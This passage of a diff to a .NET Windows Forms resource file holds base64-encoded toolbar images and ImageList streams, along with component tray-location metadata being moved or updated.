AgABZgHMAgABZgH/AgABmQMAAZkBMwIAAZkBZgIAApkCAAGZAcwCAAGZAf8CAAHMAwABzAEzAgABzAFm
AgABzAGZAgACzAIAAcwB/wIAAf8BZgIAAf8BmQIAAf8BzAEAATMB/wIAAf8BAAEzAQABMwEAAWYBAAEz
AQABmQEAATMBAAHMAQABMwEAAf8BAAH/ATMCAAMzAQACMwFmAQACMwGZAQACMwHMAQACMwH/AQABMwFm
AgABMwFmATMBAAEzAmYBAAEzAWYBmQEAATMBZgHMAQABMwFmAf8BAAEzAZkCAAEzAZkBMwEAATMBmQFm
AQABMwKZAQABMwGZAcwBAAEzAZkB/wEAATMBzAIAATMBzAEzAQABMwHMAWYBAAEzAcwBmQEAATMCzAEA
ATMBzAH/AQABMwH/ATMBAAEzAf8BZgEAATMB/wGZAQABMwH/AcwBAAEzAv8BAAFmAwABZgEAATMBAAFm
AQABZgEAAWYBAAGZAQABZgEAAcwBAAFmAQAB/wEAAWYBMwIAAWYCMwEAAWYBMwFmAQABZgEzAZkBAAFm
ATMBzAEAAWYBMwH/AQACZgIAAmYBMwEAA2YBAAJmAZkBAAJmAcwBAAFmAZkCAAFmAZkBMwEAAWYBmQFm
AQABZgKZAQABZgGZAcwBAAFmAZkB/wEAAWYBzAIAAWYBzAEzAQABZgHMAZkBAAFmAswBAAFmAcwB/wEA
AWYB/wIAAWYB/wEzAQABZgH/AZkBAAFmAf8BzAEAAcwBAAH/AQAB/wEAAcwBAAKZAgABmQEzAZkBAAGZ
AQABmQEAAZkBAAHMAQABmQMAAZkCMwEAAZkBAAFmAQABmQEzAcwBAAGZAQAB/wEAAZkBZgIAAZkBZgEz
AQABmQEzAWYBAAGZAWYBmQEAAZkBZgHMAQABmQEzAf8BAAKZATMBAAKZAWYBAAOZAQACmQHMAQACmQH/
AQABmQHMAgABmQHMATMBAAFmAcwBZgEAAZkBzAGZAQABmQLMAQABmQHMAf8BAAGZAf8CAAGZAf8BMwEA
AZkBzAFmAQABmQH/AZkBAAGZAf8BzAEAAZkC/wEAAcwDAAGZAQABMwEAAcwBAAFmAQABzAEAAZkBAAHM
AQABzAEAAZkBMwIAAcwCMwEAAcwBMwFmAQABzAEzAZkBAAHMATMBzAEAAcwBMwH/AQABzAFmAgABzAFm
ATMBAAGZAmYBAAHMAWYBmQEAAcwBZgHMAQABmQFmAf8BAAHMAZkCAAHMAZkBMwEAAcwBmQFmAQABzAKZ
AQABzAGZAcwBAAHMAZkB/wEAAswCAALMATMBAALMAWYBAALMAZkBAAPMAQACzAH/AQABzAH/AgABzAH/
ATMBAAGZAf8BZgEAAcwB/wGZAQABzAH/AcwBAAHMAv8BAAHMAQABMwEAAf8BAAFmAQAB/wEAAZkBAAHM
ATMCAAH/AjMBAAH/ATMBZgEAAf8BMwGZAQAB/wEzAcwBAAH/ATMB/wEAAf8BZgIAAf8BZgEzAQABzAJm
AQAB/wFmAZkBAAH/AWYBzAEAAcwBZgH/AQAB/wGZAgAB/wGZATMBAAH/AZkBZgEAAf8CmQEAAf8BmQHM
AQAB/wGZAf8BAAH/AcwCAAH/AcwBMwEAAf8BzAFmAQAB/wHMAZkBAAH/AswBAAH/AcwB/wEAAv8BMwEA
AcwB/wFmAQAC/wGZAQAC/wHMAQACZgH/AQABZgH/AWYBAAFmAv8BAAH/AmYBAAH/AWYB/wEAAv8BZgEA
ASEBAAGlAQADXwEAA3cBAAOGAQADlgEAA8sBAAOyAQAD1wEAA90BAAPjAQAD6gEAA/EBAAP4AQAB8AH7
Af8BAAGkAqABAAOAAwAB/wIAAf8DAAL/AQAB/wMAAf8BAAH/AQAC/wIAA/8BAAHxAe8BvAHzAvQE/wL0
AZMBbwEHDQAB/wH0BAAB7QEOAQ8BDgEAAQ4DAAEOAQAB7RIAAe8B8gH3AbwH/wGTAW8BlAFvDAAB8AIO
Ae8DAAETAfcB8gH3AbwB8AEHAREB8gHxAe8BExIAAfEB9wHxAfcB8QUAAZMBbwEWAW8BBwUABv8B8gEO
AUMBFAEOAfMCAAETAfcB7AERAfIBAAHyAfcBkgEHAe8BExMAAfEB7wHwAe8B8QMAAZMBbwEWAW8BGgUA
Av8B8QHvAewB7QH3AewBEQIUAQ4B/wIAARMB9wHsAQAB8wHsAfMBFQHyAesBEQETFAAB8QHvAbwB7wHx
AQABkwFvARYBbwEaBQAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt
AUMBExUAAfEB7wG8AQcBvAFvAeMBbwEaBgAB/wIHAfABtAKLAbQB8AEHAW0B7wQAAewK8AHsFgAB8QEH
AW8BRQHjARYBGgcAAfIB7wHxAYoEsgGtAfIB7wHyBAAB7QEAAf8FBwG8AgAB7RcAAfEBRgGUAUYBvAgA
AQcB8QG0AbMFsgG0AfEBBwQAAe0BAAHyAf8D9AH/AbwCAAHtFwABBwEcAm8BBwLvAQcB8AH/AwAB9wH0
BrMBsgGzAfQB9wQAAe0BAAHyAf8D9AH/AbwCAAHtFgACBwG8AfIBvAIHArwCBwH/AgAB7wH0AbMBuQaz
AfQB7wQAAe0BAAHyAf8D9AH/AbwCAAHtFQABBwK8AQAB/wG8AgcBvAHvAfEBBwHxAgABBwHyAboBuQHb
AdoC2wG5AboB8gEHBAAB7QEAAfIB/wP0Af8BvAIAAe0UAAEHArwDAAHwArwB7wHzAQcB8gHwAgAB8wEH
AfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHsEgAB8QEHAvAEAAHxAfAB7wHzAQAB/wHwAfEDAAHx
AfAB8wG6AbQCugHzAvEFAAHtAQAB8gHrARMBEQJtAwABkhIAAbwB8wHwBQAB8gG8AfEB7wH/AQAC/wMA
Af8B8QEHAfMB9AH/AfMBvAHxAf8FAAHtAQAB/wHzAfIB8QLyARABAAHrAf8SAAHyAfEB8gUAAf8B8QHw
AfIBvAH/BwAB8wHwAgcB8AHzBwAB7QcAAREBEwH/HAAB/wHzAvEB/xQAAfcH7QEVAf8WAAH/AbQCAAEH
CBIBBxD/ARIEFQH/AUMBKgL/Ae8CFQESEgABtQTPAQAB6gj/AeoB/w7UAf8BbQX/ASoB9gIjA/8BbRIA
Ac8BAAH/AbQCAAFtAf8C9ATzAf8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BbQH/A/MB/wEq
AfYBwwF6AaYC/wFtAgAC7AQAA+wEAALsAQABzwUAAW0B/wH0BfMB/wFtAf8B1ALcARkC9AEZAdwB2wHa
AdMB1AHbAdQB/wFtAf8D9AL/ASoBegGzAdMBpgH/AQcCAAHsAf8E7AH/AewB/wTsAf8B7AcAAesB/wbz
Af8B6wH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHrAf8E9AH/ASoBCQHiAbMB0wGmAv8BAAHsBf8B7AH/
AewF/wHsAQABuwVsAewB/wbzAf8B7AH/DtQB/wHrAf8E9AL/AawBCQHiAbMB0wGmAv8B7Ab/AewG/wHs
AQABiwUZAewB/wbzAf8B7AH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B6wH/BfQC/wGsAQkB4gGz
AdMBpgH/AewB/wHsAf8B7AH/AewB/wHsBf8B7AEAAYsFGQHsAf8E8wP/AewB/wHUAtwBGQL0ARkB3AHb
AdoB0wHUAdsB1AH/AesJ/wGsAQkB4gGzASYBIAHsAv8B7AP/AewG/wHsAQABkAUZAe0B/wTzAf8C7QHw
Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCv8BrAEJAf8BJgEgAewB/wHsA/8B7AH/AewF/wHs
AQABkAUZAZIG/wGSAQcBAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHsC/8BrAEmAd4BJQHsAv8C7AL/
AewG/wHsAQABswUZAQcG9wHwAgAB/w7UAf8B7An/AvQB/wElASAB/wHsAf8B7AP/AewB/wHsBf8B7AEA
AbMFGQIJARkBswYAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCP8BtQLqAQcD/wHsAv8C7AL/
AewG/wHsAQABuQQZAQkDGQG5BAABzwEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCP8BtQP/
AfcCAALsBP8B7AH/AewE/wLsAQABuQMZAgkBGQK5AQkB/wG0AgABzwEAAf8B1AIZAfQC/wH0ARkBCQPc
AQkB1AH/AewI/wG1Av8B9wUABOwBAAHsAQAE7AMAAbkGGQG5AboBAATPAbUBAAH/DtQB/wHtCP8BtQH/
AfcUAAEJBrkBCQIAAf8BtAQAEP8K7QH3SAAC8AG8Ae8CkQHvAbwC8AcAAQcBcgFPA0kBcgEHBQAO/wMA
AbwMAAEHAgABvAEHAfcB7wGzAtsBswLvAQcBvAUAAZgBTwFQBJgBTwFJARwEAAEHDOsBBwIAAfMBAAIH
Cv8CAAHwAbsCswGQAboC2wG6AZACswG7AfADAAGYAU8BeAEIAZgClwGYAQgBlwFJARwDAAHrDAcB6wUA
A/QI/wIAAfABtALcBtsC3AG0AfACAAEHAU8BeAEIBpcBCAGXAUkBBwIAAewBvAoPAbwB7AIAAfMBAAIH
A/QH/wIAAbwBswHcAtsB3ALbAdwC2wHcAbMBvAIAAXgBVgEIApcBeAEbAZgDlwEIAU8BcgIAAewB8AoQ
AfAB7AUAA/QB6wEOARAB7AERA/8BAAG8Ae8BtAPbAbMCugGzA9sBtAHvAbwBAAFQApgBlwF4A/8BmAKX
ApgBTwIAAewB8QEQAhEC/wERAf8CEQEQAfEB7AIAAfMBAAIHAfQB8AEAAfAB9AHtAQAD/wEAAQcBswG6
AdsB3AGzAbwCAAG8AbMB3AHbAboBswEHAQABTwGYAZcBeAL/AfQC/wGYApcBmAFJAgAB7AHxAREBQwH/
BkMBEQHxAewFAALzAfIBDgHsAfMBvAEAAfQC/wEAAbsB2wLcAdsBtAQAAbQB2wLcAdsBuwEAAVUBCAF4
AZcBCAHxAZcBCAL/AZgBlwGYAU8CAAHsAfIBEQEVAf8DFQH/AhUBEQHyAewCAAHzAQABBwHvAvMBBwET
AQ4BDwEAAvQB/wEAAbsB2wPcAbQBvALwAbwBtAPcAdsBuwEAAVYCmAWXAQgB/wHzApgBTwIAAewB8wFD
AhUC/wQVAUMB8wHsBQAD8wG8AfIB9AHsARAD9AEAAbwBswLbAdwBswGSAgcBkgGzAdwC2wGzAbwBAAGY
AZcBCAaXAQgBlwEIAVABlwIAAewB9AFDCBQBQwH0AewCAAHzAQABBwHvAvMB7AEPAQ4BEQHvA/QCAAG8
AbQB2wHhAdwBswKQAbMB3AHhAdsBtAG8AgABCAFWAXgBCAaXAQgBeAFPAQcCAAHtAf8KQwH/Ae0FAAHy
B/MD9AIAAbwBswEZA+EC3APhARkBswG8AwABmAFWAXgBCAGYAngBmAEIAXgBTwGYAwAB7Qz/Ae0CAAHz
AQABBwHvAvIG8wL0AwABtAHcAeIC2wLhAtsB4gHcAbQFAAGYAVYBlwSYAZcBUAGYBAAB8AztAfAFAATy
B/MDAAG7AbQBswG0AdsC4gHbAbQBswG0AbsGAAEIAZgEVgGYAQcVAAHzAQAM/wUAArwBswLbAbMCvCYA
AbwMAAG8BgABvAK7AbwGAAFCAU0BPgcAAT4DAAEoAwABQAMAATADAAEBAQABAQUAAYABARYAA/8CAAEB
Af8B8wHAAQMDAAEBAf8B4QHAAQMCAAEHAcEB8AEAAcABAwIAAoMB4AEAAcABAwIAAcEBBwHAAQEBwAED
AgAB4AEPAcABAwHAAQMCAAHwAR8BwAEDAdABGwIAAfgBPwHAAQMB0AEbAgAB+AEBAcABAwHQARsCAAHw
AQABwAEDAdABGwIAAeIBAAHAAQMB0AEbAgABxwEAAcABAwHQAQMCAAEPAQgB4AEHAdABAwIAAR8BBAHg
AQcB0AEDAgABHwEDAfgBHwHfAccCAAH/AYMC/wHAAQ8CAAHMBAABAwL/AQQEAAEDAv8BTAQAAQMBPAF5
AXwEAAEDAQABAQH8BAABAQEAAQEHAAEBBwABAQcAAQEHAAEBAQABAQUAAQEBAAEDBQABAQEAAT8FAAEB
AQABPQMAAQMBAAEBAQABDQMAAQcBwgGHAQABQQMAAQ8C/wEAAc8DAAEfCP8B4AEHAfABDwGAAQEBwAEA
AcABAwHgAQcBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABgAEBAYABAQGAAQEBgAEAAYABAQGAAQEBgAEB
AYADAAGAAQEBgAEBAYABAAEBAoABAQGAAQEBgAEAAQMBwAGAAQEBgAEBAYADAAGAAQEBgAEBAYADAAGA
AQEBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAcABAwGAAQEBgAEAAcABAwHgAQcBgAEBAYABAAHA
AQMB8AEPAv8BgAEAAfABDwT/AcABAAH8AT8L
</value>
</data>
<metadata name="data_dbs_ts.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 55</value>
</metadata>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>278, 55</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="data_dbs_tsl_getDBS.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
@@ -287,7 +186,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAXgBBwF4AQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
DQAAAk1TRnQBSQFMAgEBBwEAAYgBBwGIAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -348,6 +247,9 @@
AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs=
</value>
</data>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>278, 55</value>
</metadata>
<data name="data_dbs_tsl_getDatas.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
@@ -381,6 +283,104 @@
<metadata name="cms_data_dbs_lvw_data.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>538, 55</value>
</metadata>
<metadata name="myicon_list.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>747, 17</value>
</metadata>
<data name="myicon_list.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAB8
FAAAAk1TRnQBSQFMAgEBCwEAARABCAEQAQgBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAAfEB7wG8AfMC9AT/
AvQBkwFvAQcNAAH/AfQEAAHtAQ4BDwEOAQABDgMAAQ4BAAHtEgAB7wHyAfcBvAf/AZMBbwGUAW8MAAHw
Ag4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wETEgAB8QH3AfEB9wHxBQABkwFvARYBbwEHBQAG/wHy
AQ4BQwEUAQ4B8wIAARMB9wHsAREB8gEAAfIB9wGSAQcB7wETEwAB8QHvAfAB7wHxAwABkwFvARYBbwEa
BQAC/wHxAe8B7AHtAfcB7AERAhQBDgH/AgABEwH3AewBAAHzAewB8wEVAfIB6wERARMUAAHxAe8BvAHv
AfEBAAGTAW8BFgFvARoFAAH/AfQBBwHvAfAB8wHyAfAB9wFtARMBDwEHAwACEwEVAQABDwHsAQ8BAAFD
Ae0BQwETFQAB8QHvAbwBBwG8AW8B4wFvARoGAAH/AgcB8AG0AosBtAHwAQcBbQHvBAAB7ArwAewWAAHx
AQcBbwFFAeMBFgEaBwAB8gHvAfEBigSyAa0B8gHvAfIEAAHtAQAB/wUHAbwCAAHtFwAB8QFGAZQBRgG8
CAABBwHxAbQBswWyAbQB8QEHBAAB7QEAAfIB/wP0Af8BvAIAAe0XAAEHARwCbwEHAu8BBwHwAf8DAAH3
AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIAAe0WAAIHAbwB8gG8AgcCvAIHAf8CAAHvAfQBswG5
BrMB9AHvBAAB7QEAAfIB/wP0Af8BvAIAAe0VAAEHArwBAAH/AbwCBwG8Ae8B8QEHAfECAAEHAfIBugG5
AdsB2gLbAbkBugHyAQcEAAHtAQAB8gH/A/QB/wG8AgAB7RQAAQcCvAMAAfACvAHvAfMBBwHyAfACAAHz
AQcB9AGzBNsBswHzAQcB8wQAAe0BAAHyBfcB7AL0AewSAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMA
AfEB8AHzAboBtAK6AfMC8QUAAe0BAAHyAesBEwERAm0DAAGSEgABvAHzAfAFAAHyAbwB8QHvAf8BAAL/
AwAB/wHxAQcB8wH0Af8B8wG8AfEB/wUAAe0BAAH/AfMB8gHxAvIBEAEAAesB/xIAAfIB8QHyBQAB/wHx
AfAB8gG8Af8HAAHzAfACBwHwAfMHAAHtBwABEQETAf8cAAH/AfMC8QH/FAAB9wftARUB/xYAAf8BtAIA
AQcIEgEHEP8BEgQVAf8BQwEqAv8B7wIVARISAAG1BM8BAAHqCP8B6gH/DtQB/wFtBf8BKgH2AiMD/wFt
EgABzwEAAf8BtAIAAW0B/wL0BPMB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wFtAf8D8wH/
ASoB9gHDAXoBpgL/AW0CAALsBAAD7AQAAuwBAAHPBQABbQH/AfQF8wH/AW0B/wHUAtwBGQL0ARkB3AHb
AdoB0wHUAdsB1AH/AW0B/wP0Av8BKgF6AbMB0wGmAf8BBwIAAewB/wTsAf8B7AH/BOwB/wHsBwAB6wH/
BvMB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AesB/wT0Af8BKgEJAeIBswHTAaYC/wEAAewF/wHs
Af8B7AX/AewBAAG7BWwB7AH/BvMB/wHsAf8O1AH/AesB/wT0Av8BrAEJAeIBswHTAaYC/wHsBv8B7Ab/
AewBAAGLBRkB7AH/BvMB/wHsAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHrAf8F9AL/AawBCQHi
AbMB0wGmAf8B7AH/AewB/wHsAf8B7AH/AewF/wHsAQABiwUZAewB/wTzA/8B7AH/AdQC3AEZAvQBGQHc
AdsB2gHTAdQB2wHUAf8B6wn/AawBCQHiAbMBJgEgAewC/wHsA/8B7Ab/AewBAAGQBRkB7QH/BPMB/wLt
AfAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewK/wGsAQkB/wEmASAB7AH/AewD/wHsAf8B7AX/
AewBAAGQBRkBkgb/AZIBBwEAAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AewL/wGsASYB3gElAewC/wLs
Av8B7Ab/AewBAAGzBRkBBwb3AfACAAH/DtQB/wHsCf8C9AH/ASUBIAH/AewB/wHsA/8B7AH/AewF/wHs
AQABswUZAgkBGQGzBgAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewI/wG1AuoBBwP/AewC/wLs
Av8B7Ab/AewBAAG5BBkBCQMZAbkEAAHPAQAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewI/wG1
A/8B9wIAAuwE/wHsAf8B7AT/AuwBAAG5AxkCCQEZArkBCQH/AbQCAAHPAQAB/wHUAhkB9AL/AfQBGQEJ
A9wBCQHUAf8B7Aj/AbUC/wH3BQAE7AEAAewBAATsAwABuQYZAbkBugEABM8BtQEAAf8O1AH/Ae0I/wG1
Af8B9xQAAQkGuQEJAgAB/wG0BAAQ/wrtAfdIAALwAbwB7wKRAe8BvALwBwABBwFyAU8DSQFyAQcFAA7/
AwABvAwAAQcCAAG8AQcB9wHvAbMC2wGzAu8BBwG8BQABmAFPAVAEmAFPAUkBHAQAAQcM6wEHAgAB8wEA
AgcK/wIAAfABuwKzAZABugLbAboBkAKzAbsB8AMAAZgBTwF4AQgBmAKXAZgBCAGXAUkBHAMAAesMBwHr
BQAD9Aj/AgAB8AG0AtwG2wLcAbQB8AIAAQcBTwF4AQgGlwEIAZcBSQEHAgAB7AG8Cg8BvAHsAgAB8wEA
AgcD9Af/AgABvAGzAdwC2wHcAtsB3ALbAdwBswG8AgABeAFWAQgClwF4ARsBmAOXAQgBTwFyAgAB7AHw
ChAB8AHsBQAD9AHrAQ4BEAHsARED/wEAAbwB7wG0A9sBswK6AbMD2wG0Ae8BvAEAAVACmAGXAXgD/wGY
ApcCmAFPAgAB7AHxARACEQL/AREB/wIRARAB8QHsAgAB8wEAAgcB9AHwAQAB8AH0Ae0BAAP/AQABBwGz
AboB2wHcAbMBvAIAAbwBswHcAdsBugGzAQcBAAFPAZgBlwF4Av8B9AL/AZgClwGYAUkCAAHsAfEBEQFD
Af8GQwERAfEB7AUAAvMB8gEOAewB8wG8AQAB9AL/AQABuwHbAtwB2wG0BAABtAHbAtwB2wG7AQABVQEI
AXgBlwEIAfEBlwEIAv8BmAGXAZgBTwIAAewB8gERARUB/wMVAf8CFQERAfIB7AIAAfMBAAEHAe8C8wEH
ARMBDgEPAQAC9AH/AQABuwHbA9wBtAG8AvABvAG0A9wB2wG7AQABVgKYBZcBCAH/AfMCmAFPAgAB7AHz
AUMCFQL/BBUBQwHzAewFAAPzAbwB8gH0AewBEAP0AQABvAGzAtsB3AGzAZICBwGSAbMB3ALbAbMBvAEA
AZgBlwEIBpcBCAGXAQgBUAGXAgAB7AH0AUMIFAFDAfQB7AIAAfMBAAEHAe8C8wHsAQ8BDgERAe8D9AIA
AbwBtAHbAeEB3AGzApABswHcAeEB2wG0AbwCAAEIAVYBeAEIBpcBCAF4AU8BBwIAAe0B/wpDAf8B7QUA
AfIH8wP0AgABvAGzARkD4QLcA+EBGQGzAbwDAAGYAVYBeAEIAZgCeAGYAQgBeAFPAZgDAAHtDP8B7QIA
AfMBAAEHAe8C8gbzAvQDAAG0AdwB4gLbAuEC2wHiAdwBtAUAAZgBVgGXBJgBlwFQAZgEAAHwDO0B8AUA
BPIH8wMAAbsBtAGzAbQB2wLiAdsBtAGzAbQBuwYAAQgBmARWAZgBBxUAAfMBAAz/BQACvAGzAtsBswK8
JgABvAwAAbwGAAG8ArsBvAYAAUIBTQE+BwABPgMAASgDAAFAAwABMAMAAQEBAAEBBQABgAEBFgAD/wIA
AQEB/wHzAcABAwMAAQEB/wHhAcABAwIAAQcBwQHwAQABwAEDAgACgwHgAQABwAEDAgABwQEHAcABAQHA
AQMCAAHgAQ8BwAEDAcABAwIAAfABHwHAAQMB0AEbAgAB+AE/AcABAwHQARsCAAH4AQEBwAEDAdABGwIA
AfABAAHAAQMB0AEbAgAB4gEAAcABAwHQARsCAAHHAQABwAEDAdABAwIAAQ8BCAHgAQcB0AEDAgABHwEE
AeABBwHQAQMCAAEfAQMB+AEfAd8BxwIAAf8BgwL/AcABDwIAAcwEAAEDAv8BBAQAAQMC/wFMBAABAwE8
AXkBfAQAAQMBAAEBAfwEAAEBAQABAQcAAQEHAAEBBwABAQcAAQEBAAEBBQABAQEAAQMFAAEBAQABPwUA
AQEBAAE9AwABAwEAAQEBAAENAwABBwHCAYcBAAFBAwABDwL/AQABzwMAAR8I/wHgAQcB8AEPAYABAQHA
AQABwAEDAeABBwGAAQEBgAEAAYABAQHAAQMBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAYABAQGA
AQEBgAMAAYABAQGAAQEBgAEAAQECgAEBAYABAQGAAQABAwHAAYABAQGAAQEBgAMAAYABAQGAAQEBgAMA
AYABAQGAAQEBgAEAAYABAQGAAQEBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABwAEDAeABBwGAAQEBgAEA
AcABAwHwAQ8C/wGAAQAB8AEPBP8BwAEAAfwBPws=
